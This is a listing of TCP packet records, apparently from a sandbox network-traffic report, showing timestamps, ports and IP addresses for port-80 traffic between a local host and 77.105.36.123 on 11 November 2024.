                                                                                                                                                Nov 11, 2024 19:16:51.130659103 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130671024 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130682945 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130693913 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.130707979 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.130739927 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131124020 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131134987 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131145954 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131158113 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131165028 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131170988 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131182909 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131194115 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131201029 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131206036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131217957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131226063 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131230116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131236076 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131243944 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131263018 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131285906 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.132070065 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132081985 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132093906 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132107019 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132117987 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132136106 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132138014 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.132148981 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132170916 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.174288988 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.204540014 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.204602957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.204648972 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.228384972 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228426933 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228441000 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228475094 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.228542089 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228602886 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228610992 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.228619099 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228632927 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228647947 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228652954 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.228693962 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229041100 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229055882 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229072094 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229084015 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229094028 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229098082 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229124069 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229406118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229449034 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229582071 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229595900 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229607105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229618073 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229626894 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229630947 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229643106 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229655027 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229659081 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229681015 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230267048 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230281115 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230292082 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230305910 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230319977 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230319977 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230334997 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230340958 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230370045 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230382919 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230384111 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230396032 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230410099 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230410099 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230456114 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231137037 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231151104 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231162071 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231175900 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231187105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231184959 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231200933 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231210947 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231213093 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231225967 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231242895 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231245995 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231256962 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231266975 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231285095 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231321096 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231321096 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.232222080 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232239008 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232249022 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232260942 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232270956 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232281923 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232295036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232295990 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.232306957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232319117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232331038 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232342005 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.241995096 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242007017 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242018938 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242022038 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242032051 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242034912 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242046118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242058992 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242070913 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242079020 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242083073 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242093086 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242096901 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242110014 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242124081 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242160082 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242803097 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242847919 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242965937 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242985010 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242995977 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243009090 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243016958 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.243021011 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243033886 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243046999 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243057013 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243066072 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.243069887 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243086100 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.243096113 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.253957033 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.254014969 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.254029036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.254044056 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.254085064 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.254125118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.257814884 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.285537004 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.285578012 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.285598040 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.285605907 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.285653114 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.309577942 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309633970 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309648991 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309726000 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.309775114 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309788942 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309802055 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309813976 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.309814930 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309856892 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334103107 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334120989 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334141970 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334155083 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334167957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334181070 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334193945 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334259987 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334309101 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334378958 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334392071 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334403992 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334424973 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334513903 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334525108 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334549904 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334646940 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334656954 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334673882 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334688902 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334692955 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334701061 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334707975 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334716082 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334738016 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335033894 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335051060 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335082054 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335155964 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335167885 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335206985 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335207939 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335246086 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335269928 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335273981 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335287094 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335299015 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335310936 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335326910 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335330963 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335341930 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335349083 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335370064 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335947990 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335959911 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335971117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335995913 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336009026 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336093903 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336106062 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336116076 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336127996 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336146116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336148024 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336158037 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336164951 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336169958 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336182117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336194038 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336205006 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336208105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336225033 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336237907 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336246967 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336256981 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336289883 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337789059 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337801933 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337812901 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337825060 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337833881 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337836981 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337851048 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337857962 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337862968 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337874889 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337886095 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337898016 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337908983 CET4973380192.168.2.477.105.36.123
Timestamp                             Src Port  Dst Port  Src IP          Dst IP
Nov 11, 2024 19:16:51.337919950 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.337933064 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.337943077 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.337944984 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.337954998 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.337968111 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.337974072 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.337980032 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.337991953 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338001966 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338006020 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.338015079 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338021040 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338027000 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338032961 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338043928 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338054895 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338063002 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.338076115 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.338098049 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.338942051 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338956118 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338965893 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338977098 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338988066 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.338999033 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339001894 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.339011908 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339023113 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339035034 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339046001 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339052916 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.339057922 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339066982 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.339071035 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339082956 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339106083 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.339118004 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.339900017 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339912891 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339924097 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339936018 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339947939 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339951038 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.339960098 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339971066 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339983940 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.339983940 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.339996099 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340008020 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340013981 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.340020895 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340033054 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340035915 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.340059996 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.340861082 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340874910 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340886116 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340898037 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340912104 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.340913057 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340926886 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340929985 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.340939045 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340951920 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340962887 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340969086 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.340974092 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340980053 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.340986967 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.340997934 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341001987 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.341042042 CET   49733     80        192.168.2.4     77.105.36.123
Nov 11, 2024 19:16:51.341820955 CET   80        49733     77.105.36.123   192.168.2.4
Nov 11, 2024 19:16:51.341834068 CET   80        49733     77.105.36.123   192.168.2.4
